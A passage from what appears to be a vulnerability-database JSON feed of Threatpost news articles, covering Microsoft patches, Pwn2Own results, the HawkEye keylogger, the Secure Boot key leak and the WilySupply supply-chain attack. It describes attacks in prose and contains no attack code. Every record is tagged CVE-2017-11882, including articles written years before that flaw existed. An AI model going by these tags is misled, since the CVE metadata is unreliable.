control, as Microsoft and others suggested, is not sufficient to prevent exploitation. The demo shows Smith using a new tool called Killbit Visualizer to log the IDs of killbits that are specifically allowed or denied.\n\nHe is then able to get around the killbit protection on the vulnerable video control and cause the calculator to start on the machine.\n\nSmith\u2019s demo comes on the heels of a [blog post by Halvar Flake](<http://addxorrol.blogspot.com/2009/07/poking-around-msvidctldll.html>), a well-known security researcher, who pointed out nearly three weeks ago that simply setting the killbit was not going to protect users against the MsVidCtl flaw. From his post:\n\nSo, where does this leave us ?\n\n 1. The bug is actually much \u201cdeeper\u201d than most people realize.\n\n 2. The killbit-fix is clearly insufficient, as there are bound to be many other ways of triggering the issue.\n\n 3. The bug might have weaseled it\u2019s way into third-party components, IF anyone outside of Microsoft had access to the broken ATL versions.\n\n 4. If this has happened, MS might have accidentally introduced security vulnerabilities into third-party products.\n\n 5. Depending on the optimization settings applied to the executables, it might require a bit of an effort to find out whether a vulnerable or non-vulnerable version of the code is present.\n\n 6. There might be a lot of recompiling next week.\n\n 7. 
IF this has gotten into third-party-products, I would bet that only a tiny fraction of software vendors will push out proper/timely updates.\n\nMicrosoft is rushing out an [emergency patch for the vulnerability](<https://threatpost.com/researcher-shows-killbit-no-defense-msvidctl-flaw-072709/>) on Tuesday.\n", "cvss3": {}, "published": "2009-07-27T15:29:15", "type": "threatpost", "title": "Researcher Shows Killbit is No Defense on MsVidCtl Flaw", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:38:45", "id": "THREATPOST:EF7DCA1CE0B1A1B1D93B4E4F7A3A3163", "href": "https://threatpost.com/researcher-shows-killbit-no-defense-msvidctl-flaw-072709/73016/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:59:12", "description": "VANCOUVER \u2013 Successful exploits at the Pwn2Own contest get all the glitz, but the rarities are the exploits that fail.\n\nA group of four young South Korean hackers from ASRT, all of them well shy of their thirtieth birthdays, stood in proxy for Jung Hoon Lee. Lee was home fulfilling a military obligation, a promise that kept him from seeing his Internet Explorer 11 exploit come up short Thursday morning.\n\nHP\u2019s Zero Day Initiative, sponsors of the event, said they bought the vulnerability regardless, and worked with the researchers on breaking down the details. The particulars would also be shared with Microsoft as is customary with all bugs purchased by ZDI, sharing them with the affected vendors.\n\nRegistrants at Pwn2Own have 30 minutes to demonstrate their exploit and verify it works by executing the calculator application on the underlying system. In this case, Lee\u2019s exploit was chasing down a vulnerability in IE 11 on a fully patched 64-bit Windows 8.1 machine. 
A successful exploit would have been worth $100,000.\n\nGenerally, entrants in Pwn2Own withdraw if there are difficulties with their exploits. On Tuesday, Microsoft rolled out another patch for Internet Explorer. The cumulative rollup, a regular Patch Tuesday update, repaired a zero-day in Internet Explorer 10 being used in targeted attacks, including Operation SnowMan targeting the U.S. Veterans of Foreign Wars and a separate attack on a French aerospace manufacturer. It was not disclosed whether the patch affected the Lee exploit.\n\nThe failure of Lee\u2019s exploit was in stark contrast to others demonstrated to that point, including one by German researcher Sebastian Apelt of Siberas who succeeded against IE 11. Apelt\u2019s exploit worked in less than a minute and was good for $100,000. Earlier on Thursday, a pair of Chinese hackers from the Keen Team successfully exploited a zero-day vulnerability in Apple\u2019s Safari browser to gain control of a Macbook running OS X Mavericks. That exploit was worth $65,000 and the members of Keen Team announced they would donate a portion of that to Malaysian charities.\n\nSoon after the IE setback, Pwn2Own regular George Hotz took down Firefox to collect a $50,000 prize. Hotz is perhaps better known for his jailbreaking exploits against the iPhone and the PlayStation gaming console. Hotz\u2019s attack against Firefox was the fourth time zero-days were exploited in the Mozilla browser during the two-day event.\n\nHackers from French exploit vendor Vupen took down both Internet Explorer and Firefox on Wednesday as part of a $350,000 haul. Vupen also beat Adobe Reader and Flash. On Thursday, Vupen has another exploit for Chrome worth another $100,000. Once the Keen Team popped Safari today, Vupen withdrew its Safari bug. 
It also withdrew its Java entry on Wednesday.\n\nVupen founder Chaouki Bekrar said his researchers prepared for two months in advance of Pwn2Own and had little trouble with IE 11 yesterday, using a use-after-free vulnerability combined with an \u201cobject confusion\u201d to bypass the IE sandbox.\n\n\u201cIt\u2019s definitely getting harder to exploit browsers, especially on Windows 8.1,\u201d Bekrar said. \u201cExploitation is harder and finding zero-days in browsers is harder.\u201d\n\nVupen\u2019s successful exploit of Firefox on Wednesday also took advantage of a different use-after-free zero day to bypass ASLR and DEP memory protections in Windows. Bekrar said the bug was found through the use of fuzzers against 60 million test cases.\n\n\u201cThat proves Firefox has done a great job fixing flaws; the same for Chrome,\u201d Bekrar said. \u201cChrome has the strongest sandbox, so that\u2019s even more difficult to create exploits for.\u201d\n\nZDI announced prior to the event it would buy all the Pwn2Own bugs at a price of close to $1.1 million.\n", "cvss3": {}, "published": "2014-03-13T19:33:53", "type": "threatpost", "title": "IE 11 Stands Up to Pwn2Own Exploit Attempt", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-03-13T23:33:53", "id": "THREATPOST:0D250E6E576E1C05274E04DB1BB79529", "href": "https://threatpost.com/ie-11-stands-up-to-pwn2own-exploit-attempt/104786/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:02:39", "description": "Microsoft issued nine bulletins fixing 16 vulnerabilities in the July 2012 edition of Patch Tuesday. 
Three of the bulletins received Microsoft\u2019s most severe \u2018critical\u2019 rating, while the remaining six were deemed merely \u2018important.\u2019\n\nFirst and foremost among the critical patches is [MS12-043](<http://go.microsoft.com/fwlink/?LinkID=254824>), a fix for the publicly disclosed and widely publicized XML core services vulnerability that was [actively exploited last month](<https://threatpost.com/microsoft-warns-xml-vulnerability-being-actively-exploited-061312/>). Affecting Microsoft Windows, Office, Developer Tools and Server Software, it allowed attackers to execute code remotely after tricking victims into visiting a malicious website in Internet Explorer.\n\n[MS12-044](<http://go.microsoft.com/fwlink/?LinkId=254377>), also critical, is a cumulative security update for Internet Explorer resolving two privately reported bugs that, if unpatched, could allow an attacker to remotely execute code if a user visits a specially crafted webpage using Internet Explorer. Successful exploitation could grant the attacker user-rights, which, as always, will be more troublesome for users who operated with administrative rights.\n\nThe final critical bulletin, [MS12-045](<http://go.microsoft.com/fwlink/?LinkId=254441>), resolves one privately disclosed vulnerability in the data access components of Windows. Like the previous bulletin, this could potentially lead to remote code execution if the user visits a specially crafted website and allow the attacker to gain the same user rights as the current user.\n\nThe remaining \u2018important\u2019 bulletins resolve 12 vulnerabilities altogether, specifically, one bug in Visual Basic for Applications and another in the Windows Shell that could allow for remote code execution. 
The fix also covers two elevation of privilege vulnerabilities in Windows Kernel-Mode Drivers, six in SharePoint, and one more in Office for Mac, in addition to an information disclosure bug in TLS.\n\nYou can find the entire TechNet announcement [here](<http://technet.microsoft.com/en-us/security/bulletin/ms12-jul>).\n", "cvss3": {}, "published": "2012-07-10T19:23:26", "type": "threatpost", "title": "Three Critical Fixes in July Microsoft Patch Tuesday", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T20:03:28", "id": "THREATPOST:C56525805A371C56B68CE54AB4EDB9AF", "href": "https://threatpost.com/three-critical-fixes-july-microsoft-patch-tuesday-071012/76785/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:07:26", "description": "[](<https://threatpost.com/xp-sp2-will-soon-be-hackers-candy-store-071210/>)Unless thousands of companies still using Windows XP SP2 computers \nsuddenly stop procrastinating, hackers are going to be in seventh heaven come July 13. [Read the full article](<http://lastwatchdog.com/hackers-nirvana-horizon-microsofts-ends-patching/>). 
[The Last Watchdog]\n", "cvss3": {}, "published": "2010-07-12T18:06:21", "type": "threatpost", "title": "XP SP2 Will Soon Be Hacker's Candy Store", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T12:25:36", "id": "THREATPOST:64EE7E2569B19CDBC1F2000D27D9FC06", "href": "https://threatpost.com/xp-sp2-will-soon-be-hackers-candy-store-071210/74200/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:04:04", "description": "Microsoft announced today it is suing Britain\u2019s second-largest electronics retailer Comet for allegedly creating and selling more than 94,000 back-up discs of its Windows Vista and Windows XP product.\n\nComet Group PLC allegedly produced counterfeit versions of the software in a factory in Hampshire before selling them in dozens of storefronts for \u00a314.99 each (roughly $23) across the U.K.\n\n\u201cComet\u2019s actions were unfair to customers. 
We expect better from retailers of Microsoft products \u2013 and our customers deserve better, too,\u201d said David Finn, associate general counsel for Microsoft\u2019s Worldwide Anti-Piracy and Anti-Counterfeiting division in a [press release issued today](<http://www.microsoft.com/Presspass/press/2012/jan12/01-04CometPR.mspx?rss_fdn=Press%20Releases>).\n\nAccording to a report in [The Guardian](<http://www.guardian.co.uk/technology/2012/jan/04/microsoft-sue-comet-windows-discs>), Comet sold the discs between March 2008 and December 2009 and potentially made the company more than \u00a31.4 million, or $2.2 million.\n\nComet plans to contest Microsoft\u2019s claim, reasoning that in producing the discs, they acted in the best interests of their customers and according to a [statement posted to their site](<http://press.comet.co.uk/index.php?cID=330&cType=news>) \u201cdid not infringe Microsoft\u2019s intellectual property.\u201d\n\nWhile it\u2019s currently owned by French company Kesa Electricals PLC, Comet is said to be in the process of being sold to a private investment partnership lead by OpCapita LLP.\n", "cvss3": {}, "published": "2012-01-04T20:41:33", "type": "threatpost", "title": "Microsoft Sues British Electronic Dealer in Alleged Counterfeit Scam", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:33:03", "id": "THREATPOST:426AA248C0C594BAA81FC6B16FD74B7F", "href": "https://threatpost.com/microsoft-sues-british-electronic-dealer-alleged-counterfeit-scam-010412/76059/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:04:14", "description": "[](<https://threatpost.com/microsoft-unveils-new-windows-defender-offline-tool-120911/>)Microsoft has released a beta version of a new tool that can help victims of malware attacks recover from ugly infections, even if they don\u2019t have the ability to reach the Internet. 
The Windows Defender Offline tool enables users to clean their systems of malware from a CD or other removable media.\n\nIn some ways, the new tool is a throwback to the bygone days of computing and viruses when the malware universe was small enough that all of the definitions to combat it could fit on a floppy disk. Back then, users would often have a rescue disk that could help them boot their PC in the event of a messy malware infestation. Microsoft\u2019s [Windows Defender Offline](<http://windows.microsoft.com/en-US/windows/what-is-windows-defender-offline>) uses the same idea, by enabling users to download a large definition file and then transfer it to a USB drive, CD or other portable medium.\n\nThere are some pernicious classes of malware, including some rootkits and ransomware programs, that will prevent users from accessing the Internet or doing any kind of normal operations on their PCs. In those cases, it can be difficult or impossible for a user to run a system scan with installed antimalware applications or run a scan from the Web.\n\nA user who finds herself in such a situation would be able to boot her PC from the CD or USB driver containing the offline tool and then proceed with the malware cleaning.\n\n\u201cWindows Defender Offline Beta can help remove such hard to find malicious and potentially unwanted programs using definitions that recognize threats. Definitions are files that provide an encyclopedia of potential software threats. Because new threats appear daily, it\u2019s important to always have the most up-to-date definitions installed in Windows Defender Offline Beta. 
Armed with definition files, Windows Defender Offline Beta can detect malicious and potentially unwanted software, and then notify you of the risks,\u201d Microsoft\u2019s documentation for the Windows Defender Offline tool says.\n\nThe new tool is currently in beta form, but it\u2019s available for download from Microsoft\u2019s site now.\n", "cvss3": {}, "published": "2011-12-09T12:57:19", "type": "threatpost", "title": "Microsoft Unveils New Windows Defender Offline Tool", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:33:11", "id": "THREATPOST:2E13C5A3F37F020F188FBBE61F9209BC", "href": "https://threatpost.com/microsoft-unveils-new-windows-defender-offline-tool-120911/75979/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-03-08T12:00:06", "description": "The HawkEye malware kit and information-stealer has been spotted in a newfound slew of campaigns after a recent ownership change.\n\nWhile the keylogger has been in continuous development since 2013, in December a thread on a hacking site noted an ownership change, after which posts on hacking forums began to appear, selling new versions of the kit. 
\u201cHawkEye Reborn v9\u201d sports new anti-detection features and other changes, researchers said.\n\n\u201cRecent changes in both the ownership and development efforts of the HawkEye Reborn keylogger/stealer demonstrate that this is a threat that will continue to experience ongoing development and improvement moving forward,\u201d said Edmund Brumaghin and Holger Unterbrink, researchers with Cisco Talos, in a [Monday analysis.](<https://blog.talosintelligence.com/2019/04/hawkeye-reborn.html>) \u201cHawkEye has been active across the threat landscape for a long time, and will likely continue to be leveraged in the future as long as the developer of this kit can monetize their efforts.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThis latest version of HawkEye is sold through a licensing model (meaning that purchasers gain access to the software and future updates based on a varying tiered pricing model), and is being marketed on hacking sites as an \u201cadvanced monitoring solution.\u201d\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/04/16091412/hawkeye-3.png>)\n\n\u201cThe current developer of the HawkEye Reborn keylogger/stealer is continuously adding support for different applications and software platforms to facilitate the theft of sensitive information and account credentials,\u201d researchers told Threatpost. 
\u201cThe malware has recently undergone changes to the way in which it is obfuscated and additional anti-analysis techniques have been implemented as well.\u201d\n\nHawkEye Reborn v9 also now features a terms-of-service agreement: While the seller says that the keylogger should only be used on systems with permission, the agreement also explicitly forbids scanning of HawkEye Reborn v9 executables using antivirus software.\n\nIn a further attempt \u201cto minimize the likelihood that anti-malware solutions will detect HawkEye Reborn binaries,\u201d researchers said that the keylogger also now comes with several anti-analysis features, such as an anti-debugging thread and the ability to disable certain antivirus-related programs.\n\nIn tandem with the ownership change of HawkEye, researchers observed a slew of campaigns from late 2018 into 2019 that involve this most recent version of the malware.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/04/16091515/hawkeye-2.jpg>)\n\nThe malicious email campaigns include messages that appear to be requesting invoices, bills of materials, order confirmations and other things related to normal corporate functions. However, the emails actually arrive with malicious Microsoft Excel attachments (which exploit an arbitrary code execution bug in Microsoft Office, CVE-2017-11882), as well as RTF (Rich Text Format) or Doc files.\n\nWhen a victim opens the attachment, the document contents have been deliberately blurred, and the user is prompted to enable editing to get a clearer view. 
Once editing is enabled, the exploit runs and the HawkEye keylogger is downloaded.\n\nThe malware then harvests sensitive information: system details, passwords saved in common web browsers, clipboard contents, desktop screenshots, webcam pictures and account credentials.\n\nThreatpost has reached out to Cisco Talos researchers for further details about the campaigns, including how many there have been, and what victims have been targeted.\n\nMoving forward, researchers warn that HawkEye will continue to evolve. More significantly, the malware kit represents yet another offering that lowers the barrier to entry for bad actors who may not have the programming skills to carry out sophisticated attacks on their own.\n\n\u201cIn many cases, the adversaries leveraging these tools do not need to possess programming skills or in-depth computer science expertise, as they are now being provided as commercial offerings across the cybercriminal underground,\u201d researchers said.\n", "cvss3": {}, "published": "2019-04-16T14:34:54", "type": "threatpost", "title": "Malspam Campaigns Distribute HawkEye Keylogger, Post Ownership Change", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2019-04-16T14:34:54", "id": "THREATPOST:A29172A6F4C253F7A464F05CCE4E3ABB", "href": "https://threatpost.com/hawkeye-keylogger-malspam-campaigns/143807/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-10-06T23:10:26", "description": "[By Robert Westervelt, SearchSecurity.com](<http://searchsecurity.techtarget.com/news/article/0,289142,sid14_gci1351376,00.html?track=sy160>)\n\n[](<https://threatpost.com/internet-explorer-8-includes-bevy-security-features-032009/>)Microsoft has officially released [Internet Explorer 8 today](<http://www.microsoft.com/windows/internet-explorer/default.aspx>) [microsoft.com] with a number of new security features to improve privacy and protect against phishing and cross-site-scripting attacks. [From the article](<http://searchsecurity.techtarget.com/news/article/0,289142,sid14_gci1351376,00.html?track=sy160>):\n\nMicrosoft is trying to mitigate some of the common issues with a cross-site-scripting (XSS) filter, which protects against Type-1 XSS attacks. The filter in IE 8 monitors all of the requests and responses made by the browser and automatically disables XSS attacks when they\u2019re detected. When an attack is blocked, users will be alerted with a modified version of the requested page. 
The browser also has a built-in feature that analyzes URL strings and highlights the top-level domain in the address bar to prevent a person from being victimized by website spoofing.\n\nAnd more:\n\nMicrosoft also addressed the growing need for privacy while browsing certain websites. A new feature called InPrivate browsing mode enables users to control whether IE saves a record of their browsing session. Similar to the Incognito mode in Google\u2019s Chrome browser, InPrivate in IE 8 won\u2019t save cookies, passwords, browsing history or any other record if it is enabled. Microsoft said InPrivate also prevents form data, passwords and temporary Internet files from being stored, keeping the session completely private.\n\nIE 8 also includes a feature to block clickjacking attacks, preventing users from clicking an obscured or hidden Web element. The feature detects a website header designed by Web developers that declares how many frames a sensitive Web page can contain. Microsoft says the technique is not perfect, but will substantially mitigate the threat of clickjacking on sensitive websites.\n\nRead [the full article](<http://searchsecurity.techtarget.com/news/article/0,289142,sid14_gci1351376,00.html?track=sy160>) [techtarget].\n", "cvss3": {}, "published": "2009-03-20T17:17:02", "type": "threatpost", "title": "Internet Explorer 8 includes a bevy of security features", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:37", "id": "THREATPOST:215398BCE165265631436077B4E79ECB", "href": "https://threatpost.com/internet-explorer-8-includes-bevy-security-features-032009/72388/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:54:56", "description": "**Update** Opponents of the government\u2019s constant talk about [intentional backdoors](<https://threatpost.com/harvard-paper-rebuts-going-dark/116095/>) and [exceptional 
access](<https://threatpost.com/crypto-leaders-exceptional-access-will-undo-security/113639/>) finally may have their case study as to why it\u2019s such a bad idea.\n\nTwo researchers operating under aliases ([my123](<https://twitter.com/never_released>) and [slipstream](<https://twitter.com/TheWack0lian>)) this week posted a [report](<https://rol.im/securegoldenkeyboot/>)\u2014accompanied by a relentless chiptune\u2014that reveals how Microsoft inadvertently published a Secure Boot policy that acts as a backdoor that allows for the UEFI firmware feature to be disabled and for anyone to load unsigned or self-signed code.\n\nThe gaffe, meant to be a legitimate debugging and testing feature, affects Windows-based devices with Secure Boot on by default; Secure Boot checks that any components loaded during boot are [digitally signed (by Microsoft) and verified](<https://blogs.technet.microsoft.com/dubaisec/2016/03/14/diving-into-secure-boot/>). As a result of the error, users can run self-signed binaries on affected devices or install non-Windows operating systems.\n\nWorse, the researchers said, is that it\u2019s unlikely Microsoft can clean up this mess. For two months running, Microsoft has published security bulletins on [Patch Tuesday](<https://threatpost.com/windows-pdf-library-flaw-puts-edge-users-at-risk-for-rce/119773/>) that includes updates to Secure Boot. Neither, according to my123 and slipstream, has fully addressed this issue.\n\n\u201cIt\u2019d be impossible in practise for MS to revoke every bootmgr earlier than a certain point, as they\u2019d break install media, recovery partitions, backups, etc,\u201d the researchers wrote in their report.\n\n~~Microsoft did not respond to a request for comment in time for publication.~~\n\n\u201cThe jailbreak technique described in the researchers\u2019 report on August 10 does not apply to desktop or enterprise PC systems. 
It requires physical access and administrator rights to ARM and RT devices and does not compromise encryption protections,\u201d a Microsoft spokesperson told Threatpost via email.\n\nMicrosoft\u2019s first pass at fixing this in June, [MS16-094](<https://technet.microsoft.com/en-us/library/security/ms16-094.aspx>), blacklisted most, but not all, of the relevant policies, the researchers said. An attacker would still be able to manipulate bootmgr, which manages boot sequences in Windows, in order to bypass Secure Boot. The second patch, released this week in [MS16-100](<https://technet.microsoft.com/en-us/library/security/ms16-100.aspx>), revokes a set of bootmgr binaries by adding their SHA-256 hashes to the Secure Boot dbx, the forbidden-signature database. The researchers, however, said this patch may not be complete either.\n\n\u201cI checked the hash in the signature of several bootmgrs of several architectures against this list, and found no matches,\u201d slipstream said. \u201cSo either this revokes many \u2018obscure\u2019 bootmgrs and bootmgfws, or I\u2019m checking the wrong hash.\u201d\n\nWith the policy now available online, Windows devices that ship with Secure Boot locked on, including Windows RT, HoloLens, Windows Phone and possibly Surface Hub, the researchers said, can have Secure Boot disabled.\n\n\u201cA backdoor, which MS put in to secure boot because they decided to not let the user turn it off in certain devices, allows for secure boot to be disabled everywhere! You can see the irony,\u201d the researchers wrote. 
\u201cAlso the irony in that MS themselves provided us several nice \u2018golden keys\u2019 (as the FBI would say) for us to use for that purpose :)\u201d\n\nThe irony is not lost on anyone who was watching the Apple-FBI saga from early this year during which the government asked Apple to create an intentionally weakened version of iOS that would disable or bypass existing protections on a terrorist\u2019s iPhone that would wipe the phone after x-number of missed passcode guesses.\n\nApple fought the FBI in court, challenging the constitutionality of the government\u2019s demand, which was eventually dropped after the FBI found an unnamed third-party who could crack the phone.\n\nThe Secure Boot report calls out the FBI specifically.\n\n\u201cAbout the FBI: are you reading this? If you are, then this is a perfect real world example about why your idea of backdooring cryptosystems with a \u2018secure golden key\u2019 is very bad!,\u201d the researchers wrote. \u201cSmarter people than me have been telling this to you for so long, it seems you have your fingers in your ears. You seriously don\u2019t understand still? Microsoft implemented a \u2018secure golden key\u2019 system. And the golden keys got released from MS own stupidity. Now, what happens if you tell everyone to make a \u201csecure golden key\u201d system? Hopefully you can add 2+2\u2026\u201d\n\n_This article was updated Aug. 11 with a comment from Microsoft. 
_\n", "cvss3": {}, "published": "2016-08-11T11:31:39", "type": "threatpost", "title": "Microsoft Mistakenly Leaks Secure Boot Key", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2016-08-16T11:52:46", "id": "THREATPOST:43EF6CEDCAE06DF2760527AA36C42994", "href": "https://threatpost.com/microsoft-mistakenly-leaks-secure-boot-key/119828/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:53:44", "description": "Microsoft said a recent attack it calls [Operation WilySupply](<https://blogs.technet.microsoft.com/mmpc/2017/05/04/windows-defender-atp-thwarts-operation-wilysupply-software-supply-chain-cyberattack/>) utilized the update mechanism of an unnamed software editing tool to infect targets in the finance and payment industries with in-memory malware.\n\nThe unnamed editing tool was used to send unsigned malicious updates to users in targeted attacks, according to a report published Thursday.\n\n\u201cWhile their software supply chain served as a channel for attacking other organizations, they themselves were also under attack,\u201d said Elia Florio, senior security software engineer, with Windows Defender ATP Research Team.\n\nIt\u2019s unclear just how many affected parties there were and when the attacks took place. However, Florio said the attacks were selective and purposely went after only the \u201cmost valuable targets\u201d in an effort to avoid detection.\n\n\u201cWe believe that the activity group behind Operation WilySupply is motivated by financial gain. They compromise third-party software packages delivered through updaters and other channels to reach victims who are mostly in the finance and payment industries,\u201d Florio wrote.\n\nHe said Microsoft began investigating the suspicious activity after computers using the updater were red-flagged by Windows ATP. 
\u201cWindows Defender ATP initially called our attention to alerts flagging suspicious PowerShell scripts, self-deletion of executables, and other suspect activities,\u201d Florio wrote.\n\nA forensic analysis of the _Temp_ folder on one of the targeted systems revealed the legitimate third-party updater running as a service. However, closer inspection revealed the updater also had downloaded an unsigned, low-prevalence executable just before the malicious activity was observed, according to Florio.\n\n\u201cThe downloaded executable turned out to be a malicious binary (Rivit) that launched PowerShell scripts bundled with the Meterpreter reverse shell, which granted the remote attacker silent control,\u201d Florio wrote. \u201cThe malware binary, named by the cybercriminals _ue.exe_, was a small piece of code with the sole purpose of launching a Meterpreter shell.\u201d\n\nMeterpreter is a legitimate pen-testing tool packaged with the Metasploit framework and can be used to carry out in-memory or fileless attacks. Meterpreter attaches itself to a process and is capable of carrying out in-memory DLL injections. It\u2019s one of several open-source tools, such as Lazagne, that allow attackers to probe deeper into targeted systems, steal credentials and open reverse shells back to the adversary\u2019s control server. In-memory or fileless attacks, Florio said, are a [fast-growing trend among cybercriminals](<https://threatpost.com/hard-target-fileless-malware/125054/>).\n\nAttackers, Florio said, were taking advantage of the trusted relationship within the context of the software supply chain. The victims were unaware that a malicious third party had infiltrated the remote update channel of the supply chain.\n\nSelf-updating software has been targeted in the past on a number of occasions, points out Microsoft. 
Unrelated incidents include adversaries targeting Altair Technologies\u2019 EvLog update process, the auto-update mechanism for South Korean software SimDisk and the update server used by ESTsoft\u2019s ALZip compression application, according to researchers.\n\nAlso noteworthy was the reconnaissance the adversaries conducted to qualify systems before acting, using tools such as .NET, IPCONFIG, NETSTAT, NLTEST and WHOAMI, Florio said.\n\nAdditional techniques, tactics and procedures Florio noted included: memory-only payloads assisted by PowerShell and Meterpreter running in rundll32; migration into long-living processes, such as the Windows Print Spooler (_spoolsv.exe_); use of common tools like Mimikatz and Kerberoast to dump hashes; lateral movement using Windows Management Instrumentation (WMI), specifically the _WMIC /node_ command; and persistence through scheduled tasks created using the SCHTASKS and AT commands.\n\nTips on protection from such attacks include using strong encryption on update channels, putting script and configuration files in signed containers and adopting Security Development Lifecycle best practices, according to Florio.\n", "cvss3": {}, "published": "2017-05-05T14:11:31", "type": "threatpost", "title": "Supply Chain Update Software Unknowingly Used in Attacks", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2017-05-05T18:11:31", "id": "THREATPOST:3AADA643D0F6F1FA8E04B9E2C9F0354B", "href": "https://threatpost.com/supply-chain-update-software-unknowingly-used-in-attacks/125483/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:58:33", "description": "Dennis Fisher and Mike Mimoso discuss the Microsoft malware takedown, its legal and security implications and the revelation of a massive financial fraud campaign in Brazil.\n\nDownload: 
[digital_underground_157.mp3](<http://traffic.libsyn.com/digitalunderground/digital_underground_157.mp3>)\n\nMusic by Chris Gonsalves\n\n[](<https://itunes.apple.com/us/podcast/digital-underground-podcast/id315355232?mt=2>)\n", "cvss3": {}, "published": "2014-07-04T09:00:55", "type": "threatpost", "title": "Dennis Fisher and Mike Mimoso Discuss This Week's Microsoft Takedown", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-11-25T15:52:52", "id": "THREATPOST:8BA8EF04040D5048287D9AFFAD778130", "href": "https://threatpost.com/threatpost-news-wrap-july-4-2014/107003/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:03:45", "description": "[](<https://threatpost.com/microsoft-fixes-critical-ie-windows-bugs-february-patch-tuesday-021412/>)Microsoft released nine security updates on Tuesday, four rated critical and five important, fixing 21 different holes in various applications with its February patch release. The four critical fixes deal with vulnerabilities in the company\u2019s Windows, Internet Explorer, .NET Framework and Silverlight programs that could allow remote code execution if left unpatched.\n\nMicrosoft considers MS12-010 and MS12-013 as the update\u2019s top priority bulletins.\n\nMS12-010 addresses four issues in Internet Explorer, two critical, one important and one moderate. The two critical issues could allow an attacker the same rights as a logged-on user while the other two could allow an attacker to view content remotely or via the browser\u2019s processed memory.\n\nIn MS12-013, if a user were to open a specially crafted media file in Windows, it could lead to a buffer overflow in the C Run-Time Library. 
Alexander Gavrun, working with TippingPoint\u2019s Zero Day Initiative, disclosed an issue with the vulnerability, yet Microsoft claims it isn\u2019t actively being exploited in the wild.\n\nSome of the other fixes involve a flaw (MS12-015) in the less-used Visio Viewer where an attacker could gain access if a specially crafted Visio file was opened. A vulnerability (MS12-014) in Indeo Codec could allow an attacker to run arbitrary code as the logged on user if an .AVI file was opened in the same directory as a .DLL file. Similarly, in Windows\u2019 Color Control Panel, if a user opened an .ICM or .ICC file in the same directory as a .DLL file, an attacker could gain control of their computer (MS12-012).\n\nTwo of the vulnerabilities marked \u2018Important\u2019 by Microsoft deal with flaws in Windows\u2019 Ancillary Function Driver (MS12-009) and Microsoft Office and Server\u2019s Sharepoint (MS12-011). Both of these vulnerabilities could allow elevation of privilege, according to the company, if an attacker ran a malicious application for MS12-009 or encountered an XSS vulnerability in Sharepoint (MS12-011).\n\nThe monthly update is Microsoft\u2019s last batch of updates before this year\u2019s Pwn2Own competition, an annual hacking contest held the first week of March at Vancouver\u2019s [CanSecWest Conference](<http://cansecwest.com/>). 
